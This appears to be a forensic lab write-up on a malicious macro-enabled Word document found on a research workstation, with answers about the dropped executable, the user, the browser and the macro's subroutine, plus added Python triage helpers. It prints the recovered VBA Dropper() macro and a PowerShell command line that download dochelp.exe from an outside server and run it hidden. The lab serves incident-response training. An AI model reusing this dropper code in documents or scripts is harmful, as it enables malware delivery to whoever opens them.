-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(120)
-a-        12/4/2025   7:46 AM            288 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(121)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(122)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(123)
-a-        12/4/2025   7:46 AM            304 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(124)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(125)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(126)
-a-        12/4/2025   7:46 AM            304 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(127)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(128)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(129)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(13)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(130)
-a-        12/4/2025   7:46 AM            256 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(131)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(132)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(133)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(134)
-a-        12/4/2025   7:46 AM            608 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(135)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(136)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(137)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(138)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(139)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(14)
-a-        12/4/2025   7:46 AM            608 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(140)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(141)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(142)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(143)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(144)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(145)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(146)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(147)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(148)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(149)
-a-        12/4/2025   7:46 AM            272 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(15)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(150)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(151)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(152)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(153)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(154)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(155)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(156)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(157)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(158)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(159)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(16)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(160)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(161)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(162)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(163)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(164)
-a-        12/4/2025   7:46 AM        2198160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(165)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(166)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(167)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(168)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(169)
-a-        12/4/2025   7:46 AM            576 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(17)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(170)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(171)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(172)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(173)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(174)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(175)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(176)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(177)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(178)
-a-        12/4/2025   7:46 AM            272 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(179)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(18)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(180)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(181)
-a-        12/4/2025   7:46 AM            816 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(182)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(183)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(184)
-a-        12/4/2025   7:46 AM            224 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(185)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(186)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(187)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(188)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(189)
-a-        12/4/2025   7:46 AM           1872 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(19)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(190)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(191)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(192)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(193)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(2)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(20)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(21)
-a-        12/4/2025   7:46 AM          72688 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(22)
-a-        12/4/2025   7:46 AM            224 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(23)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(24)
-a-        12/4/2025   7:46 AM            272 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(25)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(26)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(27)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(28)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(29)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(3)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(30)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(31)
-a-        12/4/2025   7:46 AM            112 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(32)
-a-        12/4/2025   7:46 AM            304 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(33)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(34)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(35)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(36)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(37)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(38)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(39)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(4)
-a-        12/4/2025   7:46 AM            288 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(40)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(41)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(42)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(43)
-a-        12/4/2025   7:46 AM            256 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(44)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(45)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(46)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(47)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(48)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(49)
-a-        12/4/2025   7:46 AM            512 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(5)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(50)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(51)
-a-        12/4/2025   7:46 AM            784 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(52)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(53)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(54)
-a-        12/4/2025   7:46 AM            432 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(55)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(56)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(57)
-a-        12/4/2025   7:46 AM            912 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(58)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(59)
-a-        12/4/2025   7:46 AM            128 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(6)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(60)
-a-        12/4/2025   7:46 AM            208 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(61)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(62)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(63)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(64)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(65)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(66)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(67)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(68)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(69)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(7)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(70)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(71)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(72)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(73)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(74)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(75)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(76)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(77)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(78)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(79)
-a-        12/4/2025   7:46 AM         190480 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(8)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(80)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(81)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(82)
-a-        12/4/2025   7:46 AM            896 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(83)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(84)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(85)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(86)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(87)
-a-        12/4/2025   7:46 AM            144 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(88)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(89)
-a-        12/4/2025   7:46 AM           1520 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(9)
-a-        12/4/2025   7:46 AM            256 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(90)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(91)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(92)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(93)
-a-        12/4/2025   7:46 AM           4272 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(94)
-a-        12/4/2025   7:46 AM            496 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(95)
-a-        12/4/2025   7:46 AM            192 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(96)
-a-        12/4/2025   7:46 AM            160 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(97)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(98)
-a-        12/4/2025   7:46 AM            176 Uf_JGpT9PShnW2ZZDy8hYAO08gvJw9_Fx8rPh(99)
-a-        12/4/2025   7:46 AM         204892 Uf_JGpT9PShnW2ZZDy8i3A0aPQW8PIhy9NK0uYiv-91-6xSqE21jN3JZ95M8JQ21Vy1Ah3VAq

Answer:

AetherGen_SARS-CoV-3_Response_Plan.docm

Q38

Based on your analysis of the Word document that was downloaded on WKS-RSCH01, What is the name of the executable file that the macro in the Word document downloads and executes? Format: Provide the filename including extension as it appears in the logs.

The macro source recovered with olevba (Q42) fetches http://18.212.186.186:8080/dochelp.exe to C:\Users\Public\dochelp.exe and starts it, the Sysmon Event ID 1 PowerShell command line (Q41) records the same download, and dochelp.exe is among the HTTP objects exported from the PCAP (Q37).

Answer:

dochelp.exe

Q39

What is the username of the account that downloaded the Word document on WKS-RSCH01? Answer Format: Provide the username exactly as it appears in logs (e.g., jalvaro).

Answer:

mhardy

Q40

What is the full path of the folder where the Word document was saved on WKS-RSCH01? Answer Format: Provide the folder path only (e.g., C:\Users\username\Documents).

Answer:

C:\Users\mhardy\Downloads

Q41

Based on your analysis of the Word document that was downloaded on WKS-RSCH01, Which suspicious VBA subroutine in the macro is responsible for downloading and executing an executable?

AutoOpen()

Dropper()

Run()

Shell()

The Sysmon Event ID 1 log seen earlier records what the macro launched:

CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-WebRequest -Uri 'http://18.212.186.186:8080/dochelp.exe' -OutFile 'C:\Users\Public\dochelp.exe'; Start-Process 'C:\Users\Public\dochelp.exe'"

The timing (PowerShell at 23:50:16, 27 seconds after the document download at 23:49:49) shows the macro fired as soon as the document was opened, but the question asks which subroutine performs the download and execution, and for that the macro source is the evidence. olevba (run in Q42) recovers it: the download-and-execute logic sits in Sub Dropper(), which creates a WScript.Shell object and calls its Run method with the PowerShell command line above, window style 0 (hidden) and no wait for completion. The options map as follows:

  • AutoOpen() - Word's auto-execution entry point; if present it only triggers the payload routine
  • Dropper() - the subroutine that actually downloads dochelp.exe and starts it
  • Run() - the WScript.Shell method Dropper() calls, not a subroutine of the macro
  • Shell() - a built-in VBA function, not used here (the macro goes through WScript.Shell.Run)

Answer:

Dropper()

Q42

Based on your analysis of the macro-enabled Word document, what suspicious keyword in the VBA macro indicates that the macro created COM or OLE objects? Answer Format: Provide the name of the keyword exactly as it appears in the macro. For Example: AutoOpen

cd "C:\Users\Administrator\Desktop\Evidence\PCAPs\e"
olevba AetherGen_SARS-CoV-3_Response_Plan.docm

Relevant excerpt of the recovered VBA source:

Sub Dropper()
   Dim psDropper As Object
   Set psDropper = CreateObject("WScript.Shell")
   psDropper.Run "powershell.exe -Command ""Invoke-WebRequest -Uri 'http://18.212.186.186:8080/dochelp.exe' -OutFile 'C:\Users\Public\dochelp.exe'; Start-Process 'C:\Users\Public\dochelp.exe'""", 0, False
End Sub

CreateObject("WScript.Shell") instantiates the Windows Script Host shell COM object, and CreateObject is the keyword olevba flags for COM/OLE object creation.

Answer:

CreateObject
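As an added example (not part of the exam material), the following Python reproduces the part of olevba's triage that Q41 and Q42 rely on: it splits the VBA source into procedures, flags suspicious keywords per procedure, identifies auto-exec entry points and resolves which procedure actually downloads and executes something. The source is constructed from the Dropper() routine above; the AutoOpen() stub that calls it is an assumption added so there is an entry point to resolve (the page shows only Dropper()).

```python
import re

# Constructed VBA source for this example. Sub Dropper() is the code olevba recovered
# above; the AutoOpen() stub calling it is an ASSUMPTION added for the walk-through.
VBA_SOURCE = r'''
Sub AutoOpen()
    Dropper
End Sub

Sub Dropper()
   Dim psDropper As Object
   Set psDropper = CreateObject("WScript.Shell")
   psDropper.Run "powershell.exe -Command ""Invoke-WebRequest -Uri 'http://18.212.186.186:8080/dochelp.exe' -OutFile 'C:\Users\Public\dochelp.exe'; Start-Process 'C:\Users\Public\dochelp.exe'""", 0, False
End Sub
'''

# Procedure names Office runs without user interaction (olevba's AutoExec category).
AUTOEXEC = {"autoopen", "auto_open", "document_open", "autoexec", "autoclose",
            "auto_close", "document_close", "workbook_open", "workbook_close"}

# (label, regex) pairs, matched case-insensitively inside each procedure body.
INDICATORS = [
    ("CreateObject", r"\bCreateObject\s*\("),            # COM/OLE object creation
    ("WScript.Shell", r"WScript\.Shell"),                # shell object that can run programs
    ("Shell", r"(?<![.\w])Shell\s*\("),                  # VBA built-in Shell() function only
    ("Run", r"\.Run\b"),                                 # WScript.Shell.Run method
    ("powershell", r"powershell(?:\.exe)?"),
    ("Invoke-WebRequest", r"Invoke-WebRequest|DownloadFile|URLDownloadToFile|XMLHTTP"),
    ("Start-Process", r"Start-Process|ShellExecute"),
    ("URL", r"https?://[^\s'\"]+"),
]
DOWNLOAD = {"Invoke-WebRequest", "URL"}
EXECUTE = {"Shell", "Run", "Start-Process", "powershell"}

PROC_RE = re.compile(
    r"^[ \t]*(?:(?:Public|Private)\s+)?(Sub|Function)\s+(\w+)\b(.*?)^[ \t]*End\s+\1\b",
    re.S | re.M | re.I)


def parse_procedures(src):
    """Return {procedure_name: body} for every Sub/Function in the VBA source."""
    return {m.group(2): m.group(3) for m in PROC_RE.finditer(src)}


def find_indicators(body):
    return [label for label, pat in INDICATORS if re.search(pat, body, re.I)]


def triage(src):
    """Per-procedure indicators, call edges, auto-exec entry points and the
    procedure(s) that both download and execute."""
    procs = parse_procedures(src)
    indicators = {name: find_indicators(body) for name, body in procs.items()}
    calls = {name: [other for other in procs
                    if other != name and re.search(r"\b%s\b" % re.escape(other), body)]
             for name, body in procs.items()}
    download_exec = [name for name, hits in indicators.items()
                     if set(hits) & DOWNLOAD and set(hits) & EXECUTE]
    entry_points = [name for name in procs if name.lower() in AUTOEXEC]
    return {"entry_points": entry_points, "download_exec": download_exec,
            "indicators": indicators, "calls": calls}


if __name__ == "__main__":
    result = triage(VBA_SOURCE)
    for name, hits in result["indicators"].items():
        print("%-10s calls=%-12s indicators=%s" % (name, result["calls"][name], hits))
    print("auto-exec entry points:", result["entry_points"])
    print("download-and-execute routine(s):", result["download_exec"])
```

The distinction the output draws is the one Q41 turns on: AutoOpen() is flagged only as an entry point (no indicators of its own, one call edge to Dropper), while Dropper() carries CreateObject, WScript.Shell, .Run, powershell, Invoke-WebRequest and Start-Process and is therefore the download-and-execute routine.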

Q43

According to system event or browser history logs, what web browser did the user on WKS-RSCH01 use to access the attacker controlled web server?

Google Chrome
Mozilla Firefox
Microsoft Edge
Internet Explorer

From the PCAP analysis I performed earlier (RSCH-WKS01.pcapng), the HTTP GET request for the malicious Word document showed:

GET /AetherGen_SARS-CoV-3_Response_Plan.docm HTTP/1.1
Host: 18.212.186.186
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36

The User-Agent string clearly indicates:

  • Chrome/138.0.0.0
  • AppleWebKit/537.36 (KHTML, like Gecko)
  • Safari/537.36 (part of Chrome's user agent)

Additionally, from the Sysmon Event ID 11 (File Created) logs, I saw multiple events showing:

  • Image: C:\Program Files\Google\Chrome\Application\chrome.exe
  • Process creating files in Chrome's temp directories

And there was also a Chrome installer/updater activity:

  • C:\Program Files\Google\Chrome\Application\138.0.7204.101\Installer\chrmstp.exe

Answer

Google Chrome
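The HTTP request from Q34 and the User-Agent reading above share one parsing step, so here is one added example (not part of the exam material) covering both: parse the raw request as Wireshark shows it, pull the downloaded filename and Host, classify the browser from the User-Agent with a token order that does not misread Edge as Chrome, and format the frame time into the MM-DD-YYYY-HH:MM:SS answer format. The payload and frame time are constructed from the capture excerpt above; pulling them straight out of the pcapng is a one-liner with tshark (tshark -r RSCH-WKS01.pcapng -Y "http.request.method == GET" -T fields -e frame.time_epoch -e http.request.uri -e http.user_agent).

```python
from datetime import datetime, timezone

# Constructed sample: the GET request from RSCH-WKS01.pcapng as raw TCP payload, with the
# frame timestamp Wireshark displayed (both copied from the capture excerpt above).
FRAME_TIME = "2025-07-13T23:49:49.012957+00:00"
REQUEST = (
    b"GET /AetherGen_SARS-CoV-3_Response_Plan.docm HTTP/1.1\r\n"
    b"Host: 18.212.186.186\r\n"
    b"Connection: keep-alive\r\n"
    b"Upgrade-Insecure-Requests: 1\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    b"(KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36\r\n"
    b"Referer: http://18.212.186.186/\r\n"
    b"Accept-Encoding: gzip, deflate\r\n"
    b"\r\n"
)


def parse_request(payload):
    """Split an HTTP/1.x request into request line, lower-cased headers and the
    basename of the request target (query string stripped)."""
    head, _, _body = payload.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    filename = target.split("?", 1)[0].rsplit("/", 1)[-1]
    return {"method": method, "target": target, "version": version,
            "headers": headers, "filename": filename}


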